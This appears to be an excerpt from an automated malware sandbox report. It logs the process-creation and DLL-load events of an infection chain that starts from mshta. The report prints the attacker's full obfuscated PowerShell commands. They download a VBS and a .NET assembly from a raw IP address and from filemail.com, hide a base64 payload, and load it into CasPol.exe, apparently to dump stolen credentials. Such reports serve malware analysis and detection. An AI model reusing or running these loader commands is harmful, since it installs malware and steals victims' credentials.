                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exEJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr"
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
